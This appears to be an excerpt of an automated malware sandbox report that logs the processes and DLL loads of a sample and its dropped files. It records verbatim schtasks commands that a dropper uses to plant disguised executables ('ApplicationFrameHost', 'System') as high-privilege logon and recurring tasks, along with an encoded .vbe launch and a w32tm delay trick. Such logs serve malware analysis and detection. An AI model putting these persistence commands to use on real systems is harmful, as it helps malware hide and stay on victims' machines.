Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
Source: unknown	Process created: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
Source: unknown	Process created: C:\ServerfontSessiondhcpcommon\System.exe C:\ServerfontSessiondhcpcommon\System.exe
Source: unknown	Process created: C:\ServerfontSessiondhcpcommon\System.exe C:\ServerfontSessiondhcpcommon\System.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\System.exe "C:\ServerfontSessiondhcpcommon\System.exe"
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process created: C:\Users\user\AppData\Local\Temp\DC.exe "C:\Users\user\AppData\Local\Temp\DC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe "C:\ServerfontSessiondhcpcommon/comReviewsvc.exe"	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\System.exe "C:\ServerfontSessiondhcpcommon\System.exe"

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Section loaded: vcruntime140_clr0400.dll
